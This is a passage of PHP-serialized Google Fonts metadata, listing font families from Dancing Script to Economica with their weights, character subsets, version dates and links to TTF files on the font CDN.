Script\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:103:\"http://fonts.gstatic.com/s/dancingscript/v24/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSoHTeB9ptDqpw.ttf\";s:3:\"500\";s:103:\"http://fonts.gstatic.com/s/dancingscript/v24/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BAyoHTeB9ptDqpw.ttf\";s:3:\"600\";s:103:\"http://fonts.gstatic.com/s/dancingscript/v24/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7B7y0HTeB9ptDqpw.ttf\";s:3:\"700\";s:103:\"http://fonts.gstatic.com/s/dancingscript/v24/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7B1i0HTeB9ptDqpw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:314;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Dangrek\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v26\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/dangrek/v26/LYjCdG30nEgoH8E2gCNqqVIuTN4.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:315;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Darker Grotesque\";s:8:\"variants\";a:7:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"300\";s:93:\"http://fonts.gstatic.com/s/darkergrotesque/v7/U9MA6cuh-mLQlC4BKCtayOfARkSVoxr2AW8hTOsXsX0.ttf\";s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/darkergrotesque/v7/U9MH6cuh-mLQlC4BKCtayOfARkSVm7beJWcKUOI.ttf\";s:3:\"500\";s:93:\"http://fonts.gstatic.com/s/darkergrotesque/v7/U9MA6cuh-mLQlC4BKCtayOfARkSVo0L3AW8hTOsXsX0.ttf\";s:3:\"600\";s:93:\"http://fonts.gstatic.com/s/darkergrotesque/v7/U9MA6cuh-mLQlC4BKCtayOfARkSVo27wAW8hTOsXsX0.ttf\";s:3:\"700\";s:93:\"http://fonts.gstatic.com/s/darkergrotesque/v7/U9MA6cuh-mLQlC4BKCtayOfARkSVowrxAW8hTOsXsX0.ttf\";s:3:\"800\";s:93:\"http://fonts.gstatic.com/s/darkergrotesque/v7/U9MA6cuh-mLQlC4BKCtayOfARkSVoxbyAW8hTOsXsX0.ttf\";s:3:\"900\";s:93:\"http://fonts.gstatic.com/s/darkergrotesque/v7/U9MA6cuh-mLQlC4BKCtayOfARkSVozLzAW8hTOsXsX0.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:316;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"David Libre\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:6:\"hebrew\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/davidlibre/v12/snfus0W_99N64iuYSvp4W_l86p6TYS-Y.ttf\";s:3:\"500\";s:82:\"http://fonts.gstatic.com/s/davidlibre/v12/snfzs0W_99N64iuYSvp4W8GIw7qbSjORSo9W.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/davidlibre/v12/snfzs0W_99N64iuYSvp4W8HAxbqbSjORSo9W.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:317;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Dawning of a New Day\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/dawningofanewday/v16/t5t_IQMbOp2SEwuncwLRjMfIg1yYit_nAz8bhWJGNoBE.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:318;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Days One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/daysone/v14/mem9YaCnxnKRiYZOCLYVeLkWVNBt.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:319;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Dekko\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/dekko/v19/46khlb_wWjfSrttFR0vsfl1B.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:320;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Dela Gothic One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:5:\"greek\";i:2;s:8:\"japanese\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";i:5;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:86:\"http://fonts.gstatic.com/s/delagothicone/v10/~ChEKD0RlbGEgR290aGljIE9uZSAAKgQIARgB.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:321;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Delius\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/delius/v15/PN_xRfK0pW_9e1rtYcI-jT3L_w.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:322;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Delius Swash Caps\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/deliusswashcaps/v19/oY1E8fPLr7v4JWCExZpWebxVKORpXXedKmeBvEYs.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:323;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Delius Unicase\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v26\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/deliusunicase/v26/845BNMEwEIOVT8BmgfSzIr_6mmLHd-73LXWs.ttf\";s:3:\"700\";s:89:\"http://fonts.gstatic.com/s/deliusunicase/v26/845CNMEwEIOVT8BmgfSzIr_6mlp7WMr_BmmlS5aw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:324;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Della Respira\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/dellarespira/v18/RLp5K5v44KaueWI6iEJQBiGPRfkSu6EuTHo.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:325;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Denk One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/denkone/v15/dg4m_pzhrqcFb2IzROtHpbglShon.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:326;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Devonshire\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/devonshire/v21/46kqlbDwWirWr4gtBD2BX0Vq01lYAZM.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:327;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Dhurjati\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:6:\"telugu\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/dhurjati/v20/_6_8ED3gSeatXfFiFX3ySKQtuTA2.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:328;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Didact Gothic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/didactgothic/v19/ahcfv8qz1zt6hCC5G4F_P4ASpUySp0LlcyQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:329;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Diplomata\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/diplomata/v24/Cn-0JtiMXwhNwp-wKxyfYGxYrdM9Sg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:330;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Diplomata SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/diplomatasc/v21/buExpoi3ecvs3kidKgBJo2kf-P5Oaiw4cw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:331;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Do Hyeon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/dohyeon/v16/TwMN-I8CRRU2zM86HFE3ZwaH__-C.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:332;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Dokdo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/dokdo/v15/esDf315XNuCBLxLo4NaMlKcH.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:333;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Domine\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/domine/v19/L0xhDFMnlVwD4h3Lt9JWnbX3jG-2X3LAI10VErGuW8Q.ttf\";s:3:\"500\";s:85:\"http://fonts.gstatic.com/s/domine/v19/L0xhDFMnlVwD4h3Lt9JWnbX3jG-2X0DAI10VErGuW8Q.ttf\";s:3:\"600\";s:85:\"http://fonts.gstatic.com/s/domine/v19/L0xhDFMnlVwD4h3Lt9JWnbX3jG-2X6zHI10VErGuW8Q.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/domine/v19/L0xhDFMnlVwD4h3Lt9JWnbX3jG-2X5XHI10VErGuW8Q.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:334;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Donegal One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/donegalone/v20/m8JWjfRYea-ZnFz6fsK9FZRFRG-K3Mud.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:335;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Dongle\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":3:{s:3:\"300\";s:71:\"http://fonts.gstatic.com/s/dongle/v8/sJoG3Ltdjt6VPkqeEcxrYjWNzXvVPA.ttf\";s:7:\"regular\";s:67:\"http://fonts.gstatic.com/s/dongle/v8/sJoF3Ltdjt6VPkqmveRPah6RxA.ttf\";s:3:\"700\";s:71:\"http://fonts.gstatic.com/s/dongle/v8/sJoG3Ltdjt6VPkqeActrYjWNzXvVPA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:336;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Doppio One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/doppioone/v13/Gg8wN5gSaBfyBw2MqCh-lgshKGpe5Fg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:337;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Dorsa\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/dorsa/v23/yYLn0hjd0OGwqo493XCFxAnQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:338;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Dosis\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v27\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:83:\"http://fonts.gstatic.com/s/dosis/v27/HhyJU5sn9vOmLxNkIwRSjTVNWLEJt7MV3BkFTq4EPw.ttf\";s:3:\"300\";s:83:\"http://fonts.gstatic.com/s/dosis/v27/HhyJU5sn9vOmLxNkIwRSjTVNWLEJabMV3BkFTq4EPw.ttf\";s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/dosis/v27/HhyJU5sn9vOmLxNkIwRSjTVNWLEJN7MV3BkFTq4EPw.ttf\";s:3:\"500\";s:83:\"http://fonts.gstatic.com/s/dosis/v27/HhyJU5sn9vOmLxNkIwRSjTVNWLEJBbMV3BkFTq4EPw.ttf\";s:3:\"600\";s:83:\"http://fonts.gstatic.com/s/dosis/v27/HhyJU5sn9vOmLxNkIwRSjTVNWLEJ6bQV3BkFTq4EPw.ttf\";s:3:\"700\";s:83:\"http://fonts.gstatic.com/s/dosis/v27/HhyJU5sn9vOmLxNkIwRSjTVNWLEJ0LQV3BkFTq4EPw.ttf\";s:3:\"800\";s:83:\"http://fonts.gstatic.com/s/dosis/v27/HhyJU5sn9vOmLxNkIwRSjTVNWLEJt7QV3BkFTq4EPw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:339;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"DotGothic16\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:79:\"http://fonts.gstatic.com/s/dotgothic16/v15/v6-QGYjBJFKgyw5nSoDAGE7L435YPFrT.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:340;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Dr Sugiyama\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/drsugiyama/v22/HTxoL2k4N3O9n5I1boGI7abRM4-t-g7y.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:341;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Duru Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/durusans/v19/xn7iYH8xwmSyTvEV_HOxT_fYdN-WZw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:342;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"DynaPuff\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:12:\"cyrillic-ext\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:106:\"http://fonts.gstatic.com/s/dynapuff/v1/z7N5dRvsZDIVHbYPMhZJ3HQ83UaSu4uhr7-ZFeoYkgAr1x8RSxYu6YjrSRs4wn8.ttf\";s:3:\"500\";s:106:\"http://fonts.gstatic.com/s/dynapuff/v1/z7N5dRvsZDIVHbYPMhZJ3HQ83UaSu4uhr7-ZFeoYkgAr1x8RSyQu6YjrSRs4wn8.ttf\";s:3:\"600\";s:106:\"http://fonts.gstatic.com/s/dynapuff/v1/z7N5dRvsZDIVHbYPMhZJ3HQ83UaSu4uhr7-ZFeoYkgAr1x8RS8gp6YjrSRs4wn8.ttf\";s:3:\"700\";s:106:\"http://fonts.gstatic.com/s/dynapuff/v1/z7N5dRvsZDIVHbYPMhZJ3HQ83UaSu4uhr7-ZFeoYkgAr1x8RS_Ep6YjrSRs4wn8.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:343;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Dynalight\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/dynalight/v18/1Ptsg8LOU_aOmQvTsF4ISotrDfGGxA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:344;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"EB Garamond\";s:8:\"variants\";a:10:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:6:\"italic\";i:6;s:9:\"500italic\";i:7;s:9:\"600italic\";i:8;s:9:\"700italic\";i:9;s:9:\"800italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v26\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":10:{s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/ebgaramond/v26/SlGDmQSNjdsmc35JDF1K5E55YMjF_7DPuGi-6_RUA4V-e6yHgQ.ttf\";s:3:\"500\";s:96:\"http://fonts.gstatic.com/s/ebgaramond/v26/SlGDmQSNjdsmc35JDF1K5E55YMjF_7DPuGi-2fRUA4V-e6yHgQ.ttf\";s:3:\"600\";s:96:\"http://fonts.gstatic.com/s/ebgaramond/v26/SlGDmQSNjdsmc35JDF1K5E55YMjF_7DPuGi-NfNUA4V-e6yHgQ.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/ebgaramond/v26/SlGDmQSNjdsmc35JDF1K5E55YMjF_7DPuGi-DPNUA4V-e6yHgQ.ttf\";s:3:\"800\";s:96:\"http://fonts.gstatic.com/s/ebgaramond/v26/SlGDmQSNjdsmc35JDF1K5E55YMjF_7DPuGi-a_NUA4V-e6yHgQ.ttf\";s:6:\"italic\";s:98:\"http://fonts.gstatic.com/s/ebgaramond/v26/SlGFmQSNjdsmc35JDF1K5GRwUjcdlttVFm-rI7e8QI96WamXgXFI.ttf\";s:9:\"500italic\";s:98:\"http://fonts.gstatic.com/s/ebgaramond/v26/SlGFmQSNjdsmc35JDF1K5GRwUjcdlttVFm-rI7eOQI96WamXgXFI.ttf\";s:9:\"600italic\";s:98:\"http://fonts.gstatic.com/s/ebgaramond/v26/SlGFmQSNjdsmc35JDF1K5GRwUjcdlttVFm-rI7diR496WamXgXFI.ttf\";s:9:\"700italic\";s:98:\"http://fonts.gstatic.com/s/ebgaramond/v26/SlGFmQSNjdsmc35JDF1K5GRwUjcdlttVFm-rI7dbR496WamXgXFI.ttf\";s:9:\"800italic\";s:98:\"http://fonts.gstatic.com/s/ebgaramond/v26/SlGFmQSNjdsmc35JDF1K5GRwUjcdlttVFm-rI7c8R496WamXgXFI.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:345;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Eagle Lake\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/eaglelake/v20/ptRMTiqbbuNJDOiKj9wG5O7yKQNute8.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:346;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"East Sea Dokdo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/eastseadokdo/v20/xfuo0Wn2V2_KanASqXSZp22m05_aGavYS18y.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:347;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Eater\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/eater/v21/mtG04_FCK7bOvpu2u3FwsXsR.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:348;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Economica\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:2